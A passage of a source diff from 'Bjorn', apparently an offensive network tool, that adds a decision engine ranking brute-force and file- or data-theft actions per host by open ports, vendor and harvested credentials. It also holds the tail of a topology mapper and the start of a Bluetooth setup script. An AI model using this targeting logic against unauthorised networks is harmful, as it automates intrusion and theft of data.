# ---- Phase 3: Build Topology (60-80%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "topology"}
new_nodes, new_edges = self._phase_build_topology(
ip, hops, target_node, progress, total_steps
)
# ---- Phase 4: Aggregate (80-95%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "aggregate"}
topology = self._phase_aggregate(new_nodes, new_edges, progress, total_steps)
# ---- Phase 5: Save (95-100%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "save"}
saved_path = self._phase_save(topology, ip, progress, total_steps)
# Final UI update
node_count = len(topology.get("nodes") or {})
edge_count = len(topology.get("edges") or [])
hop_count = len([h for h in hops if h.get("ip") != "*"])
self.shared_data.comment_params = {
"ip": ip,
"hops": str(hop_count),
"nodes": str(node_count),
"edges": str(edge_count),
"file": os.path.basename(saved_path),
}
progress.set_complete()
logger.info(
f"YggdrasilMapper complete for {ip}: "
f"{hop_count} hops, {node_count} nodes, {edge_count} edges"
)
return "success"
except Exception as exc:
logger.error(f"YggdrasilMapper failed for {ip}: {exc}", exc_info=True)
self.shared_data.comment_params = {"ip": ip, "error": str(exc)[:120]}
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="YggdrasilMapper (network topology mapper)")
parser.add_argument("--ip", required=True, help="Target IP to trace")
parser.add_argument("--max-depth", type=int, default=15, help="Max traceroute depth")
parser.add_argument("--timeout", type=float, default=2.0, help="Probe timeout in seconds")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so execute() picks them up
sd.yggdrasil_max_depth = args.max_depth
sd.yggdrasil_probe_timeout = args.timeout
mapper = YggdrasilMapper(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": "",
}
result = mapper.execute(args.ip, None, row, "yggdrasil_mapper")
print(f"Result: {result}")

867
ai_engine.py Normal file
View File

@@ -0,0 +1,867 @@
"""
ai_engine.py - Dynamic AI Decision Engine for Bjorn
═══════════════════════════════════════════════════════════════════════════
Purpose:
Lightweight AI decision engine for Raspberry Pi Zero.
Works in tandem with deep learning model trained on external PC.
Architecture:
- Lightweight inference engine (no TensorFlow/PyTorch on Pi)
- Loads pre-trained model weights from PC
- Real-time action selection
- Automatic feature extraction
- Fallback to heuristics when model unavailable
Model Pipeline:
1. Pi: Collect data → Export → Transfer to PC
2. PC: Train deep neural network → Export lightweight model
3. Pi: Load model → Use for decision making
4. Repeat: Continuous learning cycle
Author: Bjorn Team
Version: 2.0.0
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional, Tuple
from pathlib import Path
from logger import Logger
logger = Logger(name="ai_engine.py", level=20)
class BjornAIEngine:
"""
Dynamic AI engine for action selection and prioritization.
Uses pre-trained model from external PC or falls back to heuristics.
"""
def __init__(self, shared_data, model_dir: str = None):
"""
Initialize AI engine
"""
self.shared_data = shared_data
self.db = shared_data.db
if model_dir is None:
self.model_dir = Path(getattr(shared_data, 'ai_models_dir', '/home/bjorn/ai_models'))
else:
self.model_dir = Path(model_dir)
self.model_dir.mkdir(parents=True, exist_ok=True)
# Model state
self.model_loaded = False
self.model_weights = None
self.model_config = None
self.feature_config = None
self.last_server_attempted = False
self.last_server_contact_ok = None
# Try to load latest model
self._load_latest_model()
# Fallback heuristics (always available)
self._init_heuristics()
logger.info(
f"AI Engine initialized (model_loaded={self.model_loaded}, "
f"heuristics_available=True)"
)
# ═══════════════════════════════════════════════════════════════════════
# MODEL LOADING
# ═══════════════════════════════════════════════════════════════════════
def _load_latest_model(self):
"""Load the most recent model from model directory"""
try:
# Find all potential model configs
all_json_files = [f for f in self.model_dir.glob("bjorn_model_*.json")
if "_weights.json" not in f.name]
# 1. Filter for files that have matching weights
valid_models = []
for f in all_json_files:
weights_path = f.with_name(f.stem + '_weights.json')
if weights_path.exists():
valid_models.append(f)
else:
logger.debug(f"Skipping model {f.name}: Weights file missing")
if not valid_models:
logger.info(f"No complete models found in {self.model_dir}. Checking server...")
# Try to download from server
if self.check_for_updates():
return
logger.info_throttled(
"No AI model available (server offline or empty). Using heuristics only.",
key="ai_no_model_available",
interval_s=600.0,
)
return
# 2. Sort by timestamp in filename (lexicographical) and pick latest
latest_model = sorted(valid_models)[-1]
weights_file = latest_model.with_name(latest_model.stem + '_weights.json')
logger.info(f"Loading model: {latest_model.name} (Weights exists!)")
with open(latest_model, 'r') as f:
model_data = json.load(f)
self.model_config = model_data.get('config', model_data)
self.feature_config = model_data.get('features', {})
# Load weights
with open(weights_file, 'r') as f:
weights_data = json.load(f)
self.model_weights = {
k: np.array(v) for k, v in weights_data.items()
}
del weights_data # Free raw dict — numpy arrays are the canonical form
self.model_loaded = True
logger.success(
f"Model loaded successfully: {self.model_config.get('version', 'unknown')}"
)
except Exception as e:
logger.error(f"Failed to load model: {e}")
import traceback
logger.debug(traceback.format_exc())
self.model_loaded = False
def reload_model(self) -> bool:
"""Reload model from disk"""
logger.info("Reloading AI model...")
self.model_loaded = False
self.model_weights = None
self.model_config = None
self.feature_config = None
self._load_latest_model()
return self.model_loaded
def check_for_updates(self) -> bool:
"""Check AI Server for new model version."""
self.last_server_attempted = False
self.last_server_contact_ok = None
try:
import requests
import os
except ImportError:
return False
url = self.shared_data.config.get("ai_server_url")
if not url:
return False
try:
logger.debug(f"Checking AI Server for updates at {url}/model/latest")
from ai_utils import get_system_mac
params = {'mac_addr': get_system_mac()}
self.last_server_attempted = True
resp = requests.get(f"{url}/model/latest", params=params, timeout=5)
# Any HTTP response means server is reachable.
self.last_server_contact_ok = True
if resp.status_code != 200:
return False
remote_config = resp.json()
remote_version = str(remote_config.get("version", "")).strip()
if not remote_version:
return False
current_version = str(self.model_config.get("version", "0")).strip() if self.model_config else "0"
if remote_version > current_version:
logger.info(f"New model available: {remote_version} (Local: {current_version})")
# Download config (stream to avoid loading the whole file into RAM)
r_conf = requests.get(
f"{url}/model/download/bjorn_model_{remote_version}.json",
stream=True, timeout=15,
)
if r_conf.status_code == 200:
conf_path = self.model_dir / f"bjorn_model_{remote_version}.json"
with open(conf_path, 'wb') as f:
for chunk in r_conf.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
os.fsync(f.fileno())
else:
logger.info_throttled(
f"AI model download skipped (config HTTP {r_conf.status_code})",
key=f"ai_model_dl_conf_{r_conf.status_code}",
interval_s=300.0,
)
return False
# Download weights (stream to avoid loading the whole file into RAM)
r_weights = requests.get(
f"{url}/model/download/bjorn_model_{remote_version}_weights.json",
stream=True, timeout=30,
)
if r_weights.status_code == 200:
weights_path = self.model_dir / f"bjorn_model_{remote_version}_weights.json"
with open(weights_path, 'wb') as f:
for chunk in r_weights.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
os.fsync(f.fileno())
logger.success(f"Downloaded model {remote_version} files to Pi.")
else:
logger.info_throttled(
f"AI model download skipped (weights HTTP {r_weights.status_code})",
key=f"ai_model_dl_weights_{r_weights.status_code}",
interval_s=300.0,
)
return False
# Reload explicitly
return self.reload_model()
logger.debug(f"Server model ({remote_version}) is not newer than local ({current_version})")
return False
except Exception as e:
self.last_server_attempted = True
self.last_server_contact_ok = False
# Server may be offline; avoid spamming errors in AI mode.
logger.info_throttled(
f"AI server unavailable for model update check: {e}",
key="ai_model_update_check_failed",
interval_s=300.0,
)
return False
# ═══════════════════════════════════════════════════════════════════════
# DECISION MAKING
# ═══════════════════════════════════════════════════════════════════════
def choose_action(
self,
host_context: Dict[str, Any],
available_actions: List[str],
exploration_rate: float = None
) -> Tuple[str, float, Dict[str, Any]]:
"""
Choose the best action for a given host.
Args:
host_context: Dict with host information (mac, ports, hostname, etc.)
available_actions: List of action names that can be executed
exploration_rate: Probability of random exploration (0.0-1.0)
Returns:
Tuple of (action_name, confidence_score, debug_info)
"""
if exploration_rate is None:
exploration_rate = float(getattr(self.shared_data, "ai_exploration_rate", 0.1))
try:
# Exploration: random action
if exploration_rate > 0 and np.random.random() < exploration_rate:
import random
action = random.choice(available_actions)
return action, 0.0, {'method': 'exploration', 'exploration_rate': exploration_rate}
# If model is loaded, use it for prediction
if self.model_loaded and self.model_weights:
return self._predict_with_model(host_context, available_actions)
# Fallback to heuristics
return self._predict_with_heuristics(host_context, available_actions)
except Exception as e:
logger.error(f"Error choosing action: {e}")
# Ultimate fallback: first available action
if available_actions:
return available_actions[0], 0.0, {'method': 'fallback_error', 'error': str(e)}
return None, 0.0, {'method': 'no_actions', 'error': 'No available actions'}
def _predict_with_model(
self,
host_context: Dict[str, Any],
available_actions: List[str]
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use loaded neural network model for prediction.
Dynamically maps extracted features to model manifest.
"""
try:
from ai_utils import extract_neural_features_dict
# 1. Get model feature manifest
manifest = self.model_config.get('architecture', {}).get('feature_names', [])
if not manifest:
# Legacy fallback
return self._predict_with_model_legacy(host_context, available_actions)
# 2. Extract host-level features
mac = host_context.get('mac', '')
host = self.db.get_host_by_mac(mac) if mac else {}
host_data = self._get_host_context_from_db(mac, host)
net_data = self._get_network_context()
temp_data_base = self._get_temporal_context(mac) # MAC-level temporal, called once
best_action = None
best_score = -1.0
all_scores = {}
# 3. Score each action
for action in available_actions:
action_data = self._get_action_context(action, host, mac)
# Merge action-level temporal overrides into temporal context copy
temp_data = dict(temp_data_base)
temp_data['same_action_attempts'] = action_data.pop('same_action_attempts', 0)
temp_data['is_retry'] = action_data.pop('is_retry', False)
# Extract all known features into a dict
features_dict = extract_neural_features_dict(
host_features=host_data,
network_features=net_data,
temporal_features=temp_data,
action_features=action_data
)
# Dynamic mapping: Pull features requested by model manifest
# Defaults to 0.0 if the Pi doesn't know this feature yet
input_vector = np.array([float(features_dict.get(name, 0.0)) for name in manifest], dtype=float)
# Neural inference (supports variable hidden depth from exported model).
z_out = self._forward_network(input_vector)
z_out = np.array(z_out).reshape(-1)
if z_out.size == 1:
# Binary classifier exported with 1-neuron sigmoid output.
score = float(self._sigmoid(z_out[0]))
else:
probs = self._softmax(z_out)
score = float(probs[1] if len(probs) > 1 else probs[0])
all_scores[action] = score
if score > best_score:
best_score = score
best_action = action
if best_action is None:
return self._predict_with_heuristics(host_context, available_actions)
# Capture the last input vector (for visualization)
# Since we iterate, we'll just take the one from the best_action or the last one.
# Usually input_vector is almost the same for all actions except action-specific bits.
debug_info = {
'method': 'neural_network_v3',
'model_version': self.model_config.get('version'),
'feature_count': len(manifest),
'all_scores': all_scores,
# Convert numpy ndarray → plain Python list so debug_info is
# always JSON-serialisable (scheduler stores it in action_queue metadata).
'input_vector': input_vector.tolist(),
}
return best_action, float(best_score), debug_info
except Exception as e:
logger.error(f"Dynamic model prediction failed: {e}")
import traceback
logger.debug(traceback.format_exc())
return self._predict_with_heuristics(host_context, available_actions)
def _predict_with_model_legacy(self, host_context: Dict[str, Any], available_actions: List[str]) -> Tuple[str, float, Dict[str, Any]]:
"""Fallback for models without feature_names manifest (fixed length 56)"""
# ... very similar to previous v2 but using hardcoded list ...
return self._predict_with_heuristics(host_context, available_actions)
def _get_host_context_from_db(self, mac: str, host: Dict) -> Dict:
"""Helper to collect host features from DB"""
ports_str = host.get('ports', '') or ''
ports = [int(p) for p in ports_str.split(';') if p.strip().isdigit()]
vendor = host.get('vendor', '')
# Calculate age
age_hours = 0.0
if host.get('first_seen'):
from datetime import datetime
try:
ts = host['first_seen']
first_seen = datetime.fromisoformat(ts) if isinstance(ts, str) else ts
age_hours = (datetime.now() - first_seen).total_seconds() / 3600
except: pass
creds = self._get_credentials_for_host(mac)
return {
'port_count': len(ports),
'service_count': len(self._get_services_for_host(mac)),
'ip_count': len((host.get('ips') or '').split(';')),
'credential_count': len(creds),
'age_hours': round(age_hours, 2),
'has_ssh': 22 in ports,
'has_http': 80 in ports or 8080 in ports,
'has_https': 443 in ports,
'has_smb': 445 in ports,
'has_rdp': 3389 in ports,
'has_database': any(p in ports for p in [3306, 5432, 1433]),
'has_credentials': len(creds) > 0,
'is_new': age_hours < 24,
'is_private': True, # Simple assumption for now
'has_multiple_ips': len((host.get('ips') or '').split(';')) > 1,
'vendor_category': self._categorize_vendor(vendor),
'port_profile': self._detect_port_profile(ports)
}
def _get_network_context(self) -> Dict:
"""Collect real network-wide stats from DB (called once per choose_action)."""
try:
all_hosts = self.db.get_all_hosts()
total = len(all_hosts)
# Subnet diversity
subnets = set()
active = 0
for h in all_hosts:
ips = (h.get('ips') or '').split(';')
for ip in ips:
ip = ip.strip()
if ip:
subnets.add('.'.join(ip.split('.')[:3]))
break
if h.get('alive'):
active += 1
return {
'total_hosts': total,
'subnet_count': len(subnets),
'similar_vendor_count': 0, # filled by caller if needed
'similar_port_profile_count': 0, # filled by caller if needed
'active_host_ratio': round(active / total, 2) if total else 0.0,
}
except Exception as e:
logger.error(f"Error collecting network context: {e}")
return {
'total_hosts': 0, 'subnet_count': 1,
'similar_vendor_count': 0, 'similar_port_profile_count': 0,
'active_host_ratio': 1.0,
}
def _get_temporal_context(self, mac: str) -> Dict:
"""
Collect real temporal features for a MAC from DB.
same_action_attempts / is_retry are action-specific — they are NOT
included here; instead they are merged from _get_action_context()
inside the per-action loop in _predict_with_model().
"""
from datetime import datetime
now = datetime.now()
ctx = {
'hour_of_day': now.hour,
'day_of_week': now.weekday(),
'is_weekend': now.weekday() >= 5,
'is_night': now.hour < 6 or now.hour >= 22,
'previous_action_count': 0,
'seconds_since_last': 0,
'historical_success_rate': 0.0,
'same_action_attempts': 0, # placeholder; overwritten per-action
'is_retry': False, # placeholder; overwritten per-action
'global_success_rate': 0.0,
'hours_since_discovery': 0,
}
try:
# Per-host stats from ml_features (persistent training log)
rows = self.db.query(
"""
SELECT
COUNT(*) AS cnt,
AVG(CAST(success AS REAL)) AS success_rate,
MAX(timestamp) AS last_ts
FROM ml_features
WHERE mac_address = ?
""",
(mac,),
)
if rows and rows[0]['cnt']:
ctx['previous_action_count'] = int(rows[0]['cnt'])
ctx['historical_success_rate'] = round(float(rows[0]['success_rate'] or 0.0), 2)
if rows[0]['last_ts']:
try:
last_dt = datetime.fromisoformat(str(rows[0]['last_ts']))
ctx['seconds_since_last'] = round(
(now - last_dt).total_seconds(), 1
)
except Exception:
pass
# Global success rate (all hosts)
g = self.db.query(
"SELECT AVG(CAST(success AS REAL)) AS gsr FROM ml_features"
)
if g and g[0]['gsr'] is not None:
ctx['global_success_rate'] = round(float(g[0]['gsr']), 2)
# Hours since host first seen
host = self.db.get_host_by_mac(mac)
if host and host.get('first_seen'):
try:
ts = host['first_seen']
first_seen = datetime.fromisoformat(ts) if isinstance(ts, str) else ts
ctx['hours_since_discovery'] = round(
(now - first_seen).total_seconds() / 3600, 1
)
except Exception:
pass
except Exception as e:
logger.error(f"Error collecting temporal context for {mac}: {e}")
return ctx
# Action-specific temporal fields populated by _get_action_context
_ACTION_PORTS = {
'SSHBruteforce': 22, 'SSHEnumeration': 22, 'StealFilesSSH': 22,
'WebEnumeration': 80, 'WebVulnScan': 80, 'WebLoginProfiler': 80,
'WebSurfaceMapper': 80,
'SMBBruteforce': 445, 'StealFilesSMB': 445,
'FTPBruteforce': 21, 'StealFilesFTP': 21,
'TelnetBruteforce': 23, 'StealFilesTelnet': 23,
'SQLBruteforce': 3306, 'StealDataSQL': 3306,
'NmapVulnScanner': 0, 'NetworkScanner': 0,
'RDPBruteforce': 3389,
}
def _get_action_context(self, action_name: str, host: Dict, mac: str = '') -> Dict:
"""
Collect action-specific features including per-action attempt history.
Merges action-type + target-port info with action-level temporal stats.
"""
action_type = self._classify_action_type(action_name)
target_port = self._ACTION_PORTS.get(action_name, 0)
# If port not in lookup, try to infer from action name
if target_port == 0:
name_lower = action_name.lower()
for svc, port in [('ssh', 22), ('http', 80), ('smb', 445), ('ftp', 21),
('telnet', 23), ('sql', 3306), ('rdp', 3389)]:
if svc in name_lower:
target_port = port
break
ctx = {
'action_type': action_type,
'target_port': target_port,
'is_standard_port': 0 < target_port < 1024,
# Action-level temporal (overrides placeholder in temporal_context)
'same_action_attempts': 0,
'is_retry': False,
}
if mac:
try:
r = self.db.query(
"""
SELECT COUNT(*) AS cnt
FROM ml_features
WHERE mac_address = ? AND action_name = ?
""",
(mac, action_name),
)
attempts = int(r[0]['cnt']) if r else 0
ctx['same_action_attempts'] = attempts
ctx['is_retry'] = attempts > 0
except Exception as e:
logger.debug(f"Action context DB query failed for {action_name}: {e}")
return ctx
def _classify_action_type(self, action_name: str) -> str:
"""Classify action name into a type"""
name = action_name.lower()
if 'brute' in name: return 'bruteforce'
if 'enum' in name or 'scan' in name: return 'enumeration'
if 'exploit' in name: return 'exploitation'
if 'dump' in name or 'extract' in name: return 'extraction'
return 'other'
# ═══════════════════════════════════════════════════════════════════════
# HEURISTIC FALLBACK
# ═══════════════════════════════════════════════════════════════════════
def _init_heuristics(self):
"""Initialize rule-based heuristics for cold start"""
self.heuristics = {
'port_based': {
22: ['SSHBruteforce', 'SSHEnumeration'],
80: ['WebEnumeration', 'WebVulnScan'],
443: ['WebEnumeration', 'SSLScan'],
445: ['SMBBruteforce', 'SMBEnumeration'],
3389: ['RDPBruteforce'],
21: ['FTPBruteforce', 'FTPEnumeration'],
23: ['TelnetBruteforce'],
3306: ['MySQLBruteforce'],
5432: ['PostgresBruteforce'],
1433: ['MSSQLBruteforce']
},
'service_based': {
'ssh': ['SSHBruteforce', 'SSHEnumeration'],
'http': ['WebEnumeration', 'WebVulnScan'],
'https': ['WebEnumeration', 'SSLScan'],
'smb': ['SMBBruteforce', 'SMBEnumeration'],
'ftp': ['FTPBruteforce', 'FTPEnumeration'],
'mysql': ['MySQLBruteforce'],
'postgres': ['PostgresBruteforce']
},
'profile_based': {
'camera': ['WebEnumeration', 'DefaultCredCheck', 'RTSPBruteforce'],
'nas': ['SMBBruteforce', 'WebEnumeration', 'SSHBruteforce'],
'web_server': ['WebEnumeration', 'WebVulnScan'],
'database': ['MySQLBruteforce', 'PostgresBruteforce'],
'linux_server': ['SSHBruteforce', 'WebEnumeration'],
'windows_server': ['SMBBruteforce', 'RDPBruteforce']
}
}
def _predict_with_heuristics(
self,
host_context: Dict[str, Any],
available_actions: List[str]
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use rule-based heuristics for action selection.
Provides decent performance without machine learning.
"""
try:
mac = host_context.get('mac', '')
host = self.db.get_host_by_mac(mac) if mac else {}
# Get ports and services
ports_str = host.get('ports', '') or ''
ports = {int(p) for p in ports_str.split(';') if p.strip().isdigit()}
services = self._get_services_for_host(mac)
# Detect port profile
port_profile = self._detect_port_profile(ports)
# Scoring system
action_scores = {action: 0.0 for action in available_actions}
# Score based on ports
for port in ports:
if port in self.heuristics['port_based']:
for action in self.heuristics['port_based'][port]:
if action in action_scores:
action_scores[action] += 0.3
# Score based on services
for service in services:
if service in self.heuristics['service_based']:
for action in self.heuristics['service_based'][service]:
if action in action_scores:
action_scores[action] += 0.4
# Score based on port profile
if port_profile in self.heuristics['profile_based']:
for action in self.heuristics['profile_based'][port_profile]:
if action in action_scores:
action_scores[action] += 0.3
# Find best action
if action_scores:
best_action = max(action_scores, key=action_scores.get)
best_score = action_scores[best_action]
# Normalize score to 0-1
if best_score > 0:
best_score = min(best_score / 1.0, 1.0)
debug_info = {
'method': 'heuristics',
'port_profile': port_profile,
'ports': list(ports)[:10],
'services': services,
'all_scores': {k: v for k, v in action_scores.items() if v > 0}
}
return best_action, best_score, debug_info
# Ultimate fallback
if available_actions:
return available_actions[0], 0.1, {'method': 'fallback_first'}
return None, 0.0, {'method': 'no_actions'}
except Exception as e:
logger.error(f"Heuristic prediction failed: {e}")
if available_actions:
return available_actions[0], 0.0, {'method': 'fallback_error', 'error': str(e)}
return None, 0.0, {'method': 'error', 'error': str(e)}
# ═══════════════════════════════════════════════════════════════════════
# HELPER METHODS
# ═══════════════════════════════════════════════════════════════════════
@staticmethod
def _relu(x):
"""ReLU activation function"""
return np.maximum(0, x)
@staticmethod
def _sigmoid(x):
"""Sigmoid activation function"""
return 1.0 / (1.0 + np.exp(-x))
@staticmethod
def _softmax(x):
"""Softmax activation function"""
exp_x = np.exp(x - np.max(x)) # Numerical stability
return exp_x / exp_x.sum()
def _forward_network(self, input_vector: np.ndarray) -> np.ndarray:
"""
Forward pass through exported dense network with dynamic hidden depth.
Expected keys: w1/b1, w2/b2, ..., w_out/b_out
"""
a = input_vector
layer_idx = 1
while f'w{layer_idx}' in self.model_weights:
w = self.model_weights[f'w{layer_idx}']
b = self.model_weights[f'b{layer_idx}']
a = self._relu(np.dot(a, w) + b)
layer_idx += 1
return np.dot(a, self.model_weights['w_out']) + self.model_weights['b_out']
def _get_services_for_host(self, mac: str) -> List[str]:
"""Get detected services for host"""
try:
results = self.db.query("""
SELECT DISTINCT service
FROM port_services
WHERE mac_address=?
""", (mac,))
return [r['service'] for r in results if r.get('service')]
except:
return []
def _get_credentials_for_host(self, mac: str) -> List[Dict]:
"""Get credentials found for host"""
try:
return self.db.query("""
SELECT service, user, port
FROM creds
WHERE mac_address=?
""", (mac,))
except:
return []
def _categorize_vendor(self, vendor: str) -> str:
"""Categorize vendor (same as feature_logger)"""
if not vendor:
return 'unknown'
vendor_lower = vendor.lower()
categories = {
'networking': ['cisco', 'juniper', 'ubiquiti', 'mikrotik', 'tp-link'],
'iot': ['hikvision', 'dahua', 'axis'],
'nas': ['synology', 'qnap'],
'compute': ['raspberry', 'intel', 'apple', 'dell', 'hp'],
'virtualization': ['vmware', 'microsoft'],
'mobile': ['apple', 'samsung', 'huawei']
}
for category, vendors in categories.items():
if any(v in vendor_lower for v in vendors):
return category
return 'other'
def _detect_port_profile(self, ports) -> str:
"""Detect device profile from ports (same as feature_logger)"""
port_set = set(ports)
profiles = {
'camera': {554, 80, 8000},
'web_server': {80, 443, 8080},
'nas': {5000, 5001, 548, 139, 445},
'database': {3306, 5432, 1433, 27017},
'linux_server': {22, 80, 443},
'windows_server': {135, 139, 445, 3389},
'printer': {9100, 515, 631},
'router': {22, 23, 80, 443, 161}
}
max_overlap = 0
best_profile = 'generic'
for profile_name, profile_ports in profiles.items():
overlap = len(port_set & profile_ports)
if overlap > max_overlap:
max_overlap = overlap
best_profile = profile_name
return best_profile if max_overlap >= 2 else 'generic'
# ═══════════════════════════════════════════════════════════════════════
# STATISTICS
# ═══════════════════════════════════════════════════════════════════════
def get_stats(self) -> Dict[str, Any]:
"""Get AI engine statistics"""
stats = {
'model_loaded': self.model_loaded,
'heuristics_available': True,
'decision_mode': 'neural_network' if self.model_loaded else 'heuristics'
}
if self.model_loaded and self.model_config:
stats.update({
'model_version': self.model_config.get('version'),
'model_trained_at': self.model_config.get('trained_at'),
'model_accuracy': self.model_config.get('accuracy'),
'training_samples': self.model_config.get('training_samples')
})
return stats
# ═══════════════════════════════════════════════════════════════════════════
# SINGLETON FACTORY
# ═══════════════════════════════════════════════════════════════════════════
def get_or_create_ai_engine(shared_data) -> Optional['BjornAIEngine']:
"""
Return the single BjornAIEngine instance attached to shared_data.
Creates it on first call; subsequent calls return the cached instance.
Use this instead of BjornAIEngine(shared_data) to avoid loading model
weights multiple times (orchestrator + scheduler + web each need AI).
"""
if getattr(shared_data, '_ai_engine_singleton', None) is None:
try:
shared_data._ai_engine_singleton = BjornAIEngine(shared_data)
except Exception as e:
logger.error(f"Failed to create BjornAIEngine singleton: {e}")
shared_data._ai_engine_singleton = None
return shared_data._ai_engine_singleton
def invalidate_ai_engine(shared_data) -> None:
"""Drop the cached singleton (e.g. after a mode reset or model update)."""
shared_data._ai_engine_singleton = None
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════

99
ai_utils.py Normal file
View File

@@ -0,0 +1,99 @@
"""
ai_utils.py - Shared AI utilities for Bjorn
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional
def extract_neural_features_dict(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> Dict[str, float]:
"""
Extracts all available features as a named dictionary.
This allows the model to select exactly what it needs by name.
"""
f = {}
# 1. Host numericals
f['host_port_count'] = float(host_features.get('port_count', 0))
f['host_service_count'] = float(host_features.get('service_count', 0))
f['host_ip_count'] = float(host_features.get('ip_count', 0))
f['host_credential_count'] = float(host_features.get('credential_count', 0))
f['host_age_hours'] = float(host_features.get('age_hours', 0))
# 2. Host Booleans
f['has_ssh'] = 1.0 if host_features.get('has_ssh') else 0.0
f['has_http'] = 1.0 if host_features.get('has_http') else 0.0
f['has_https'] = 1.0 if host_features.get('has_https') else 0.0
f['has_smb'] = 1.0 if host_features.get('has_smb') else 0.0
f['has_rdp'] = 1.0 if host_features.get('has_rdp') else 0.0
f['has_database'] = 1.0 if host_features.get('has_database') else 0.0
f['has_credentials'] = 1.0 if host_features.get('has_credentials') else 0.0
f['is_new'] = 1.0 if host_features.get('is_new') else 0.0
f['is_private'] = 1.0 if host_features.get('is_private') else 0.0
f['has_multiple_ips'] = 1.0 if host_features.get('has_multiple_ips') else 0.0
# 3. Vendor Category (One-Hot)
vendor_cats = ['networking', 'iot', 'nas', 'compute', 'virtualization', 'mobile', 'other', 'unknown']
current_vendor = host_features.get('vendor_category', 'unknown')
for cat in vendor_cats:
f[f'vendor_is_{cat}'] = 1.0 if cat == current_vendor else 0.0
# 4. Port Profile (One-Hot)
port_profiles = ['camera', 'web_server', 'nas', 'database', 'linux_server',
'windows_server', 'printer', 'router', 'generic', 'unknown']
current_profile = host_features.get('port_profile', 'unknown')
for prof in port_profiles:
f[f'profile_is_{prof}'] = 1.0 if prof == current_profile else 0.0
# 5. Network Stats
f['net_total_hosts'] = float(network_features.get('total_hosts', 0))
f['net_subnet_count'] = float(network_features.get('subnet_count', 0))
f['net_similar_vendor_count'] = float(network_features.get('similar_vendor_count', 0))
f['net_similar_port_profile_count'] = float(network_features.get('similar_port_profile_count', 0))
f['net_active_host_ratio'] = float(network_features.get('active_host_ratio', 0.0))
# 6. Temporal features
f['time_hour'] = float(temporal_features.get('hour_of_day', 0))
f['time_day'] = float(temporal_features.get('day_of_week', 0))
f['is_weekend'] = 1.0 if temporal_features.get('is_weekend') else 0.0
f['is_night'] = 1.0 if temporal_features.get('is_night') else 0.0
f['hist_action_count'] = float(temporal_features.get('previous_action_count', 0))
f['hist_seconds_since_last'] = float(temporal_features.get('seconds_since_last', 0))
f['hist_success_rate'] = float(temporal_features.get('historical_success_rate', 0.0))
f['hist_same_attempts'] = float(temporal_features.get('same_action_attempts', 0))
f['is_retry'] = 1.0 if temporal_features.get('is_retry') else 0.0
f['global_success_rate'] = float(temporal_features.get('global_success_rate', 0.0))
f['hours_since_discovery'] = float(temporal_features.get('hours_since_discovery', 0))
# 7. Action Info
action_types = ['bruteforce', 'enumeration', 'exploitation', 'extraction', 'other']
current_type = action_features.get('action_type', 'other')
for atype in action_types:
f[f'action_is_{atype}'] = 1.0 if atype == current_type else 0.0
f['action_target_port'] = float(action_features.get('target_port', 0))
f['action_is_standard_port'] = 1.0 if action_features.get('is_standard_port') else 0.0
return f
def extract_neural_features(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> List[float]:
"""
Deprecated: Hardcoded list. Use extract_neural_features_dict for evolution.
Kept for backward compatibility during transition.
"""
d = extract_neural_features_dict(host_features, network_features, temporal_features, action_features)
# Return as a list in a fixed order (the one previously used)
# This is fragile and will be replaced by manifest-based extraction.
return list(d.values())
def get_system_mac() -> str:
"""
Get the persistent MAC address of the device.
Used for unique identification in Swarm mode.
"""
try:
import uuid
mac = uuid.getnode()
return ':'.join(('%012X' % mac)[i:i+2] for i in range(0, 12, 2))
except:
return "00:00:00:00:00:00"

517
bjorn_bluetooth.sh Normal file
View File

@@ -0,0 +1,517 @@
#!/bin/bash
# bjorn_bluetooth_manager.sh
# Script to configure Bluetooth PAN for BJORN
# Usage: ./bjorn_bluetooth_manager.sh -f
# ./bjorn_bluetooth_manager.sh -u
# ./bjorn_bluetooth_manager.sh -l
# ./bjorn_bluetooth_manager.sh -h
# Author: Infinition
# Version: 1.1
# Description: This script configures and manages Bluetooth PAN for BJORN
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Configuration
# ============================================================
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_bluetooth_manager_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" | tee -a "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
"CYAN") echo -e "${CYAN}$message${NC}" ;;
*) echo -e "$message" ;;
esac
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "$1"
return $?
fi
}
# ============================================================
